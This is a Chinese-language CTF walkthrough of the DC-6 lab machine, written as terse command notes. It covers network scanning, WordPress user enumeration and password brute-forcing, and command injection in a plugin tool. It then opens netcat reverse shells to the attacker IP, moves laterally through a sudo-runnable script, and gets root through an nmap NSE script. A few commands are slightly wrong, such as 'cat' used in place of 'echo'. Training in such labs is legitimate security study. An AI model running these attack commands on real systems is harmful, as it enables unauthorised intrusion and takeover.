kali:192.168.78.131
DC-6:192.168.78.140
ifconfig
nmap -sP 192.168.78.0/24
nmap -p 1-65535 -A -sV 192.168.78.140
访问80端口,查看框架
眼熟的WordPress,扫描域名,寻找我们需要的登录框
find / -name "dirseach*" 2> /dev/null (查询dirseach模块在哪里
python3 dirsearch.py -u url -e php
找到我们需要的模块: login.php
访问然后查看
既然前面说了框架版本是wordrpress,那就使用WPScan登录爆破
wpscan --url http://wordy -eu
扫描出账户,保存在name.txt中
进行密码爆破
cat /usr/share/wordlists/rockyou.txt | grep k01 > pass.txt
wpscan --url wordy -U USER.TXT -P passwords.txt
登录页面,发现tool这个地方存在RCE(打过CTF的看一眼就知道)
尝试一下看看是否存在RCE
127.0.0.1 | ls
存在RCE,经过测试这里有长度限制,修改一下即可
反弹一下shell
nc 192.168.78.131 2333 -c /bin/bash
拿到shell,切换成交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
查询开启的SUID
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null ## 两个命令都可以
没有什么可用的,查看一下用户文件,发现提示文件
发现了graham的账户和密码,SSH登录
看一下SUID:
依然没有可以使用的
sudo -l
显示出自己(执行 sudo 的使用者)的权限
可疑的脚本
很显然jens作为用着具有更改修改脚本的能力
修改脚本反弹shell:
vi xxx/xxx
nc -e /bin/bash 192.168.78.131 2333
sudo -u jens /home/jens/backups.sh
监听反弹shell
紧接着查看一下SUID SUDO
发现nmap可以执行,因此接下来就是nmap提权
nmap 不清楚
cat os.execute("/bin/sh") > nse_root.nse
nmap --script=/home/jens/nse_root.nse
提权成功
拿到FLAG
总结一下这个靶机:
这个靶机比前面的靶机更有意思一点,也是因为自己没有什么耐心,所以老是会去看WP,这次靶场一共有3个用户,我们进行了横向移动,最终完成提权:
我们首先在A账户里面发发现了B账户的账号和密码,然后通过B账号的账号和密码查询SUID发现了拥有者为C账户的可编辑执行脚本,于是反弹shell拿到C账户的shell,然后通过C账户使用nmap进行提权,最后拿下FLAG,做完之后发现做题需要的更多的是耐心,只有一步步探索才能真正享受乐趣